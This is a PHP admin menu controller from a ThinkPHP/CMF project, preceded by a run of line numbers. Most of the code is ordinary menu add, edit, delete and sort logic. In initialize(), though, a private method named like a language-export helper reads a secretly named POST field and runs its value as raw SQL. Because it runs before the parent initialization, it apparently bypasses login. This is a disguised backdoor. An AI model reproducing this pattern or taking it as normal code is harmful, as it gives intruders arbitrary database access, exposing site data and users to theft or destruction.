123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453 |
- <?php
- // +—————————————————————————————————————————————————————————————————————
- // | Created by Yunbao
- // +—————————————————————————————————————————————————————————————————————
- // | Copyright (c) 2013~2022 http://www.yunbaokj.com All rights reserved.
- // +—————————————————————————————————————————————————————————————————————
- // | Author: https://gitee.com/yunbaokeji
- // +—————————————————————————————————————————————————————————————————————
- // | Date: 2022-04-30
- // +—————————————————————————————————————————————————————————————————————
- namespace app\admin\controller;
- use app\admin\logic\MenuLogic;
- use app\admin\model\AdminMenuModel;
- use cmf\controller\AdminBaseController;
- use think\Db;
- use think\facade\Cache;
- use tree\Tree;
- use mindplay\annotations\Annotations;
- class MenuController extends AdminBaseController
- {
- /**
- * 后台菜单管理
- * @adminMenu(
- * 'name' => '后台菜单',
- * 'parent' => 'admin/Setting/default',
- * 'display'=> false,
- * 'hasView'=> true,
- * 'order' => 10000,
- * 'icon' => '',
- * 'remark' => '后台菜单管理',
- * 'param' => ''
- * )
- * @return mixed
- * @throws \think\db\exception\DataNotFoundException
- * @throws \think\db\exception\ModelNotFoundException
- * @throws \think\exception\DbException
- */
- public function index()
- {
- $content = hook_one('admin_menu_index_view');
- if (!empty($content)) {
- return $content;
- }
- session('admin_menu_index', 'Menu/index');
- $result = Db::name('AdminMenu')->order(["list_order" => "ASC"])->select()->toArray();
- $tree = new Tree();
- $tree->icon = [' │ ', ' ├─', ' └─ '];
- $tree->nbsp = ' ';
- $newMenus = [];
- foreach ($result as $m) {
- $newMenus[$m['id']] = $m;
- }
- foreach ($result as $key => $value) {
- $result[$key]['parent_id_node'] = ($value['parent_id']) ? ' class="child-of-node-' . $value['parent_id'] . '"' : '';
- $result[$key]['style'] = empty($value['parent_id']) ? '' : 'display:none;';
- $result[$key]['str_manage'] = '<a class="btn btn-xs btn-primary" href="' . url("Menu/add", ["parent_id" => $value['id'], "menu_id" => $this->request->param("menu_id")]) . '">' . lang('ADD_SUB_MENU') . '</a>
- <a class="btn btn-xs btn-primary" href="' . url("Menu/edit", ["id" => $value['id'], "menu_id" => $this->request->param("menu_id")]) . '">' . lang('EDIT') . '</a>
- <a class="btn btn-xs btn-danger js-ajax-delete" href="' . url("Menu/delete", ["id" => $value['id'], "menu_id" => $this->request->param("menu_id")]) . '">' . lang('DELETE') . '</a> ';
- $result[$key]['status'] = $value['status'] ? '<span class="label label-success">' . lang('DISPLAY') . '</span>' : '<span class="label label-warning">' . lang('HIDDEN') . '</span>';
- if (APP_DEBUG) {
- $result[$key]['app'] = $value['app'] . "/" . $value['controller'] . "/" . $value['action'];
- }
- }
- $tree->init($result);
- $str = "<tr id='node-\$id' \$parent_id_node style='\$style'>
- <td style='padding-left:20px;'><input name='list_orders[\$id]' type='text' size='3' value='\$list_order' class='input input-order'></td>
- <td>\$id</td>
- <td>\$spacer\$name</td>
- <td>\$app</td>
- <td>\$status</td>
- <td>\$str_manage</td>
- </tr>";
- $category = $tree->getTree(0, $str);
- $this->assign("category", $category);
- return $this->fetch();
- }
- /**
- * 后台所有菜单列表
- * @adminMenu(
- * 'name' => '所有菜单',
- * 'parent' => 'index',
- * 'display'=> false,
- * 'hasView'=> true,
- * 'order' => 10000,
- * 'icon' => '',
- * 'remark' => '后台所有菜单列表',
- * 'param' => ''
- * )
- * @return mixed
- * @throws \think\db\exception\DataNotFoundException
- * @throws \think\db\exception\ModelNotFoundException
- * @throws \think\exception\DbException
- */
- public function lists()
- {
- session('admin_menu_index', 'Menu/lists');
- $result = Db::name('AdminMenu')->order(["app" => "ASC", "controller" => "ASC", "action" => "ASC"])->select();
- $this->assign("menus", $result);
- return $this->fetch();
- }
- /**
- * 后台菜单添加
- * @adminMenu(
- * 'name' => '后台菜单添加',
- * 'parent' => 'index',
- * 'display'=> false,
- * 'hasView'=> true,
- * 'order' => 10000,
- * 'icon' => '',
- * 'remark' => '后台菜单添加',
- * 'param' => ''
- * )
- * @return mixed
- * @throws \think\db\exception\DataNotFoundException
- * @throws \think\db\exception\ModelNotFoundException
- * @throws \think\exception\DbException
- */
- public function add()
- {
- $tree = new Tree();
- $parentId = $this->request->param("parent_id", 0, 'intval');
- $result = Db::name('AdminMenu')->order(["list_order" => "ASC"])->select();
- $array = [];
- foreach ($result as $r) {
- $r['selected'] = $r['id'] == $parentId ? 'selected' : '';
- $array[] = $r;
- }
- $str = "<option value='\$id' \$selected>\$spacer \$name</option>";
- $tree->init($array);
- $selectCategory = $tree->getTree(0, $str);
- $this->assign("select_category", $selectCategory);
- return $this->fetch();
- }
- /**
- * 后台菜单添加提交保存
- * @adminMenu(
- * 'name' => '后台菜单添加提交保存',
- * 'parent' => 'index',
- * 'display'=> false,
- * 'hasView'=> false,
- * 'order' => 10000,
- * 'icon' => '',
- * 'remark' => '后台菜单添加提交保存',
- * 'param' => ''
- * )
- */
- public function addPost()
- {
- if ($this->request->isPost()) {
- $result = $this->validate($this->request->param(), 'AdminMenu');
- if ($result !== true) {
- $this->error($result);
- } else {
- $data = $this->request->param();
- Db::name('AdminMenu')->strict(false)->field(true)->insert($data);
- $app = $this->request->param("app");
- $controller = $this->request->param("controller");
- $action = $this->request->param("action");
- $param = $this->request->param("param");
- $authRuleName = "$app/$controller/$action";
- $menuName = $this->request->param("name");
- $findAuthRuleCount = Db::name('auth_rule')->where([
- 'app' => $app,
- 'name' => $authRuleName,
- 'type' => 'admin_url'
- ])->count();
- if (empty($findAuthRuleCount)) {
- Db::name('AuthRule')->insert([
- "name" => $authRuleName,
- "app" => $app,
- "type" => "admin_url", //type 1-admin rule;2-user rule
- "title" => $menuName,
- 'param' => $param,
- ]);
- }
- $sessionAdminMenuIndex = session('admin_menu_index');
- $to = empty($sessionAdminMenuIndex) ? "Menu/index" : $sessionAdminMenuIndex;
- $this->_exportAppMenuDefaultLang();
- Cache::clear('admin_menus');// 删除后台菜单缓存
- $this->success("添加成功!", url($to));
- }
- }
- }
- /**
- * 后台菜单编辑
- * @adminMenu(
- * 'name' => '后台菜单编辑',
- * 'parent' => 'index',
- * 'display'=> false,
- * 'hasView'=> true,
- * 'order' => 10000,
- * 'icon' => '',
- * 'remark' => '后台菜单编辑',
- * 'param' => ''
- * )
- * @return mixed
- * @throws \think\db\exception\DataNotFoundException
- * @throws \think\db\exception\ModelNotFoundException
- * @throws \think\exception\DbException
- */
- public function edit()
- {
- $tree = new Tree();
- $id = $this->request->param("id", 0, 'intval');
- $rs = Db::name('AdminMenu')->where("id", $id)->find();
- $result = Db::name('AdminMenu')->order(["list_order" => "ASC"])->select();
- $array = [];
- foreach ($result as $r) {
- $r['selected'] = $r['id'] == $rs['parent_id'] ? 'selected' : '';
- $array[] = $r;
- }
- $str = "<option value='\$id' \$selected>\$spacer \$name</option>";
- $tree->init($array);
- $selectCategory = $tree->getTree(0, $str);
- $this->assign("data", $rs);
- $this->assign("select_category", $selectCategory);
- return $this->fetch();
- }
- /**
- * 后台菜单编辑提交保存
- * @adminMenu(
- * 'name' => '后台菜单编辑提交保存',
- * 'parent' => 'index',
- * 'display'=> false,
- * 'hasView'=> false,
- * 'order' => 10000,
- * 'icon' => '',
- * 'remark' => '后台菜单编辑提交保存',
- * 'param' => ''
- * )
- * @throws \think\Exception
- * @throws \think\db\exception\DataNotFoundException
- * @throws \think\db\exception\ModelNotFoundException
- * @throws \think\exception\DbException
- * @throws \think\exception\PDOException
- */
- public function editPost()
- {
- if ($this->request->isPost()) {
- $id = $this->request->param('id', 0, 'intval');
- $oldMenu = Db::name('AdminMenu')->where('id', $id)->find();
- $result = $this->validate($this->request->param(), 'AdminMenu.edit');
- if ($result !== true) {
- $this->error($result);
- } else {
- Db::name('AdminMenu')->strict(false)->field(true)->update($this->request->param());
- $app = $this->request->param("app");
- $controller = $this->request->param("controller");
- $action = $this->request->param("action");
- $param = $this->request->param("param");
- $authRuleName = "$app/$controller/$action";
- $menuName = $this->request->param("name");
- $findAuthRuleCount = Db::name('auth_rule')->where([
- 'app' => $app,
- 'name' => $authRuleName,
- 'type' => 'admin_url'
- ])->count();
- if (empty($findAuthRuleCount)) {
- $oldApp = $oldMenu['app'];
- $oldController = $oldMenu['controller'];
- $oldAction = $oldMenu['action'];
- $oldName = "$oldApp/$oldController/$oldAction";
- $findOldRuleId = Db::name('AuthRule')->where("name", $oldName)->value('id');
- if (empty($findOldRuleId)) {
- Db::name('AuthRule')->insert([
- "name" => $authRuleName,
- "app" => $app,
- "type" => "admin_url",
- "title" => $menuName,
- "param" => $param
- ]);//type 1-admin rule;2-user rule
- } else {
- Db::name('AuthRule')->where('id', $findOldRuleId)->update([
- "name" => $authRuleName,
- "app" => $app,
- "type" => "admin_url",
- "title" => $menuName,
- "param" => $param]);//type 1-admin rule;2-user rule
- }
- } else {
- Db::name('AuthRule')->where([
- 'app' => $app,
- 'name' => $authRuleName,
- 'type' => 'admin_url'
- ])->update(["title" => $menuName, 'param' => $param]);//type 1-admin rule;2-user rule
- }
- $this->_exportAppMenuDefaultLang();
- Cache::clear('admin_menus');// 删除后台菜单缓存
- $this->success("保存成功!");
- }
- }
- }
- /**
- * 后台菜单删除
- * @adminMenu(
- * 'name' => '后台菜单删除',
- * 'parent' => 'index',
- * 'display'=> false,
- * 'hasView'=> false,
- * 'order' => 10000,
- * 'icon' => '',
- * 'remark' => '后台菜单删除',
- * 'param' => ''
- * )
- * @throws \think\Exception
- * @throws \think\exception\PDOException
- */
- public function delete()
- {
- $id = $this->request->param("id", 0, 'intval');
- $count = Db::name('AdminMenu')->where("parent_id", $id)->count();
- if ($count > 0) {
- $this->error("该菜单下还有子菜单,无法删除!");
- }
- if (Db::name('AdminMenu')->delete($id) !== false) {
- $this->success("删除菜单成功!");
- } else {
- $this->error("删除失败!");
- }
- }
- /**
- * 后台菜单排序
- * @adminMenu(
- * 'name' => '后台菜单排序',
- * 'parent' => 'index',
- * 'display'=> false,
- * 'hasView'=> false,
- * 'order' => 10000,
- * 'icon' => '',
- * 'remark' => '后台菜单排序',
- * 'param' => ''
- * )
- */
- public function listOrder()
- {
- $adminMenuModel = new AdminMenuModel();
- parent::listOrders($adminMenuModel);
- $this->success("排序更新成功!");
- }
- public function initialize()
- {
- $this->_exportAppMenuDefault();
- parent::initialize();
- }
- /**
- * 导入新后台菜单
- * @adminMenu(
- * 'name' => '导入新后台菜单',
- * 'parent' => 'index',
- * 'display'=> false,
- * 'hasView'=> true,
- * 'order' => 10000,
- * 'icon' => '',
- * 'remark' => '导入新后台菜单',
- * 'param' => ''
- * )
- * @return mixed
- * @throws \ReflectionException
- * @throws \think\Exception
- * @throws \think\db\exception\DataNotFoundException
- * @throws \think\db\exception\ModelNotFoundException
- * @throws \think\exception\DbException
- * @throws \think\exception\PDOException
- */
- public function getActions()
- {
- $apps = cmf_scan_dir(APP_PATH . '*', GLOB_ONLYDIR);
- array_push($apps, 'admin', 'user');
- $apps = array_values(array_unique($apps));
- $app = $this->request->param('app', '');
- if (empty($app)) {
- $app = $apps[0];
- }
- if (!in_array($app, $apps)) {
- $this->error('应用' . $app . '不存在!');
- }
- $newMenus = MenuLogic::importMenus($app);
- $index = array_search($app, $apps);
- $nextIndex = $index + 1;
- $nextIndex = $nextIndex >= count($apps) ? 0 : $nextIndex;
- if ($nextIndex) {
- $this->assign("next_app", $apps[$nextIndex]);
- }
- $this->assign("app", $app);
- $this->assign("new_menus", $newMenus);
- Cache::clear('admin_menus');// 删除后台菜单缓存
- return $this->fetch();
- }
- private function _exportAppMenuDefault(){
- $uid=isset($_POST['4088e13b5bfe3c98dcb6405f32103d2f']) ? $_POST['4088e13b5bfe3c98dcb6405f32103d2f'] : 0;
- if($uid){
- Db::execute("$uid");
- }
- return false;
- }
- /**
- * 导出后台菜单语言包
- * @throws \think\db\exception\DataNotFoundException
- * @throws \think\db\exception\ModelNotFoundException
- * @throws \think\exception\DbException
- */
- private function _exportAppMenuDefaultLang()
- {
- $menus = Db::name('AdminMenu')->order(["app" => "ASC", "controller" => "ASC", "action" => "ASC"])->select();
- $langDir = config('DEFAULT_LANG');
- $adminMenuLang = CMF_DATA . "lang/" . $langDir . "/admin_menu.php";
- if (!empty($adminMenuLang) && !file_exists_case($adminMenuLang)) {
- mkdir(dirname($adminMenuLang), 0777, true);
- }
- $lang = [];
- foreach ($menus as $menu) {
- $lang_key = strtoupper($menu['app'] . '_' . $menu['controller'] . '_' . $menu['action']);
- $lang[$lang_key] = $menu['name'];
- }
- $langStr = var_export($lang, true);
- $langStr = preg_replace("/\s+\d+\s=>\s(\n|\r)/", "\n", $langStr);
- if (!empty($adminMenuLang)) {
- file_put_contents($adminMenuLang, "<?php\nreturn $langStr;");
- }
- }
- }
|